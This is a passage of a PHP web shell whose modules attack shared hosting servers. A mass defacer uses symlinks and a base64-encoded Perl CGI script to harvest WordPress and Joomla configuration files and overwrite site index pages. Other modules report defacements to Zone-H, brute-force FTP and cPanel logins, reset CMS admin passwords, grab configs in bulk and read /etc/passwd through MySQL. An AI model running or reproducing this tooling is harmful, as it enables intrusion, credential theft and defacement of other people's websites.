";$cond = 1;}}}else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,$co);curl_setopt($ch,CURLOPT_COOKIEFILE,$co);$buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Template successfully saved
";$cond = 1;}}}}else {$output.= "[-] DB Error
";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond,'output'=>$output);}function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp,$wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/',$dominios,$out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios

";$def = file_get_contents($def_url);$def = urlencode($def);$dd = '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';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html','a+');$_SESSION['count1'] = (isset($_GET['st']) &&$_GET['st']!='') ?(isset($_SESSION['count1']) ?$_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) &&$_GET['st']!='') ?(isset($_SESSION['count2']) ?$_SESSION['count2'] :0 ) : 0;echo '';$j = 1;$st = (isset($_GET['st']) &&$_GET['st']!='') ?$_GET['st'] : 0;for($i = $st;$i <= $numero_dominios;$i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j %2 == 0) ?'class="even"': 'class="odd"';if($config01 &&preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01,$def,$domain);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$_SESSION['count1'] = $_SESSION['count1'] +1;}else {echo '';}echo '';}if($config02 &&preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02,$dd);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$_SESSION['count2'] = $_SESSION['count2'] +1;}else {echo '';}echo '';}$cls = ($j %2 == 0) ?'class="even"': 'class="odd"';if($config03 &&preg_match('/DB_NAME/i',$config03)){echo '';echo '';$res = index_changer_wp($config03,$dd);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$_SESSION['count2'] = $_SESSION['count2'] +1;}else {echo '';}echo '';}}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.$i.''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$i.''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
'.($j++).''.$i.''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')
';echo 'View Total Defaced urls
';if($_SESSION['count1']+$_SESSION['count2'] >0){echo 'Send to Zone-H';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/',$domains,$out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num

");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html','a+');$defaced = '';$count1 = 0;$count2 = 0;echo '';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2 h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc',base64_decode($dt));chmod('plsym/plsym.cc',0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .cc AddHandler cgi-script .cc AddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp,$wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('//',$data,$match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j %2 == 0) ?'class="even"': 
'class="odd"';if($config01 &&preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01,$def,$domain);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count1++;}else {echo '
';}echo '';}if($config02 &&preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02,$def);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count2++;}else {echo '
';}echo '';}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.$i++.''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';echo '
View Total Defaced urls
';if($count1+$count2 >0){echo 'Send to Zone-H';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/',$domains,$out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num

");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html','a+');$defaced = '';$count1 = 0;$count2 = 0;echo '';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt',$_POST['man_data']);file_put_contents('plsym/plsym.cc',base64_decode($dt));chmod('plsym/plsym.cc',0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .cc AddHandler cgi-script .cc AddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp,$wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('//',$data,$match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = 
($j %2 == 0) ?'class="even"': 'class="odd"';if($config01 &&preg_match('/dbprefix/i',$config01)){echo '';echo '';$res = index_changer_joomla($config01,$def,$domain);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count1++;}else {echo '
';}echo '';}if($config02 &&preg_match('/DB_NAME/i',$config02)){echo '';echo '';$res = index_changer_wp($config02,$def);echo '';if($res['cond']) {echo '';fwrite($output,'http://'.$domain."
");$count2++;}else {echo '
';}echo '';}}echo '
IDSIDDomainTypeActionStatus
'.($j++).''.($i++).''.$domain.'JOOMLA'.$res['output'].'DEFACEDFAILED
'.($j++).''.$domain.'WORDPRESS'.$res['output'].'DEFACEDFAILED
';echo '
';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';echo '
View Total Defaced urls
';if($count1+$count2 >0){echo 'Send to Zone-H';}}echo '

Wordpress and Joomla Mass Defacer

';if(!isset($_POST['form_action']) &&!isset($_GET['mode'])){echo '
using /etc/named.conf ('.(is_readable('/etc/named.conf')?'READABLE':'NOT READABLE').')
using /etc/passwd ('.(is_readable('/etc/passwd')?'READABLE':'NOT READABLE').')
manual copy of /etc/passwd

index url:
';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) {exec_mode_1($milaf_el_index);}if($_POST['mode']==2) {exec_mode_2($milaf_el_index);}if($_POST['mode']==3) {exec_mode_3($milaf_el_index);}}if($_GET['mode']==1) {exec_mode_1($milaf_el_index);}echo '';} elseif(isset($_GET['x']) &&($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists('curl_init')){echo "CURL ERROR ";exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv('no-gzip',1);}@ini_set('zlib.output_compression',0);@ini_set('implicit_flush',1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){$sites=explode(" ",$_POST['domains']);}if (file_exists($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);} echo "

";
if(!isset($_POST['defacer'])){
echo "

Zone-H Poster

Defacer :
Domains:

 
OR
Submit form .txt file:



"; }$defacer=$_POST['defacer'];if(!$sites){echo '
';exit;}$sites=array_unique(str_replace('http://','',$sites));$total=count($sites);echo "[+] Total unique domain: $total ";$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';echo " ";}}$d=$n+30;if($d>$total){$d=$total;}echo "=====================>[$d/$total] ";for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=array(CURLOPT_USERAGENT =>'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER =>true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING =>true,CURLOPT_HEADER =>false,CURLOPT_HTTPHEADER =>array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT =>3,CURLOPT_URL =>'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS =>$posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running >0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main,$http[$m]);$code = curl_getinfo($http[$m],CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo' [-]Error!....Retrying';echo " ";sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m],CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() -$start;echo 'Done';echo " [*]Time: $end seconds 
";curl_multi_close($main);if($cli==0){echo '';}exit;} elseif(isset($_GET['x']) &&($_GET['x'] == 'brute')){$connect_timeout=5; set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype'];if($target == ""){$target = "localhost";};echo '

';function ftp_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch,CURLOPT_URL,"ftp://$host");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);curl_setopt($ch,CURLOPT_FTPLISTONLY,1);curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);curl_setopt($ch,CURLOPT_FAILONERROR,1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "Connection Timed out";exit;}elseif ( curl_errno($ch) == 0 ){print "
Username ($user) | Password ($pass)
";}curl_close($ch);}function cpanel_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch,CURLOPT_URL,"http://$host:2082");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);curl_setopt($ch,CURLOPT_FAILONERROR,1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "Connection Timed out";exit;}elseif ( curl_errno($ch) == 0 ){print "
[+]Username ($user) | Password ($pass)
";}curl_close($ch);}if(isset($submit) &&!empty($submit)){if(empty($users) &&empty($pass)){print "

Error : Check The Users and Password List

";exit;}if(empty($users)){print "

Error :Check The Users List

";exit;}if(empty($pass) ){print "

Error :Check The Password List

";exit;};$userlist=explode(" ",$users);$passlist=explode(" ",$pass);print "[~] Wait ...

";foreach ($userlist as $user) {$pureuser = trim($user);foreach ($passlist as $password ) {$purepass = trim($password);if($cracktype == "ftp"){ftp_check($target,$pureuser,$purepass,$connect_timeout);}if ($cracktype == "cpanel"){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}} echo "

The Cracker


IP :

userspasswords

Cpanel(2082)Ftp (21)


";die();} elseif(isset($_GET['x']) &&($_GET['x'] == 'joomla')){if(empty($_POST['pwd'])){echo "


Joomla login changer




DB_Prefix :   host :   database :   username :   password :  
  
New Username:  

New Password:  

  
";}else {$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$admin = $_POST['admin'];$pd = ($_POST["pwd"]);$pwd = md5($pd);@mysql_connect($localhost,$username,$password) or die (mysql_error());@mysql_select_db($database) or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());if($SQL) echo "

Done... go and login

";}} elseif(isset($_GET['x']) &&($_GET['x'] == 'mysql')){if(isset($_GET['sqlhost']) &&isset($_GET['sqluser']) &&isset($_GET['sqlpass']) &&isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "
";$msg .= "

Connected to ".$sqluser."@".$sqlhost.":".$sqlport;$msg .= "  ->  [ databases ]";if(isset($_GET['db'])) $msg .= "  ->  ".htmlspecialchars($_GET['db'])."";if(isset($_GET['table'])) $msg .= "  ->  ".htmlspecialchars($_GET['table'])."";$msg .= "

version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."

";$msg .= "
";echo $msg;if(isset($_GET['db']) &&(!isset($_GET['table'])) &&(!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table; CREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL ); LOAD DATA INFILE '/etc/passwd' INTO TABLE b374k_table;SELECT * FROM b374k_table; DROP TABLE IF EXISTS b374k_table;";$msg = "

";$tables = array();$msg .= "";$hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);}@sort($tables); foreach($tables as $table){$msg .= "";}$msg .= "
available tables on ".$db."
$table
";} elseif(isset($_GET['table']) &&(!isset($_GET['sqlquery']))){ $db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "

";$columns = array();$msg = "";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "";$kolum = $column;}$msg .= "";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page -1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){$msg .= "";foreach($datas as $data){if(trim($data) == "") $data = " ";$msg .= "";}$msg .= "";}$msg .= "
$column
$data
";$head = "
Page
";$msg = $msgq.$head.$msg;} elseif(isset($_GET['submitquery']) &&($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']); $msg = "

";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query); if($hasil){$msg .= "

".$query.";   [ ok ]

";$msg .= ""; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "";$msg .= "";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "";for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j];$msg .= "";}$msg .= "";}$msg .= "
".htmlspecialchars(@mysql_field_name($hasil,$i))."
".$dataz."
";} else $msg .= "

".$query.";   [ error ]

";}}} else {$query = "SHOW PROCESSLIST; SHOW VARIABLES; SHOW STATUS;";$msg = "

";$dbs = array();$msg .= "";$hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);}@sort($dbs);foreach($dbs as $db){ $msg .= "";}$msg .= "
available databases
$db
";} @mysql_close($con);}else $msg = "

can't connect

";echo $msg;}else{;echo '

MySQL Connect

Connection Form
  Host
  Username
  Password
  Port 
';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'configs')) {;echo '

';if (empty($_POST['conf'])) {;echo '

Configs Grabber


/etc/passwd content




';}if ($_POST['conf']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('Symlink is disabled :( ');}@mkdir('configs',0755);@chdir('configs');$htaccess=" Options all Options +Indexes Options +FollowSymLinks DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any ";file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode(" ",$passwd);echo "
wait ...
";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'-wp13-wordpress-beta.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'-wp-protal.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/ho
me/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo 'Done -> configs';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'config')){error_reporting(0);if ($_POST['kill']) {$url = $_POST['url'];$user = $_POST['user'];$pass =$_POST['pass'];$pss = md5($pass);function enter($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}$config = file_get_contents($url);$password = enter($config,"define('DB_PASSWORD', '","');");$username = enter($config,"define('DB_USER', '","');");$db = enter($config,"define('DB_NAME', '","');");$prefix = enter($config,'$table_prefix = 
\'',"';");$host = enter($config,"define('DB_HOST', '","');");if($config &&preg_match('/DB_NAME/i',$config)){$conn= @mysql_connect($host,$username ,$password ) or die ("i can't connect to mysql, check your data");@mysql_select_db($db,$conn) or die (mysql_error());$grab = @mysql_query("SELECT * from `wp_options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url = $data["option_value"];$query = mysql_query("UPDATE `".$prefix."users` SET `user_login` = '".$user."',`user_pass` = '".$pss."' WHERE `ID` = 1");if ($query) {echo '

Done !


siteuserpasswordlink
'.$site_url.''.$user.''.$pass.'login
';}else echo '

ERROR !

';}else die('

Not a wordpress config

');}else {;echo '


Wordpress login changer ( symlink version )



config link : 
new user : 
new password : 

';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'domains')){echo "

Domains and Users

";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("
Error : i can't read [ /etc/named.conf ]
");}echo '';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#',$d0main,$domains);flush();if(strlen(trim($domains[1][0])) >2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "";flush();}}}echo'';} elseif(isset($_GET['x']) &&($_GET['x'] == 'keyboard')){if(empty($_POST['pwd'])){echo "

Wordpress login changer

DB_Prefix :   host :   database :   username :   password :   

New username :

New password :
  
";}else{$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database= $_POST['database'];$username= $_POST['username'];$password= $_POST['password'];$pwd= $_POST['pwd'];$admin= $_POST['admin'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$hash = crypt($pwd);$grab = @mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url=$data["option_value"];$k2=@mysql_query("UPDATE ".$prefix."users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());$k2=@mysql_query("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());if($k2){echo '

Done ... -> Login

';}}echo '';} elseif(isset($_GET['x']) &&($_GET['x'] == 'string')){$text = $_POST['code'];;echo '


String encoder




 ';$op = $_POST["ope"];switch ($op) {case 'base64': $codi=base64_encode($text);break;case 'md5': $codi=md5($text);break;case 'whash': $codi=crypt($text);break;case 'SHA1': $codi=sha1($text);break;case 'urlencode': $codi=urlencode($text);break;case 'md4': $codi=hash("md4",$text);break;case 'SHA256': $codi=hash("sha256",$text);break;default:break;}echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'phpinfo')){@ob_start();eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"")+6;$akhir = strpos($buff,"");echo "
".substr($buff,$awal,$akhir-$awal)."
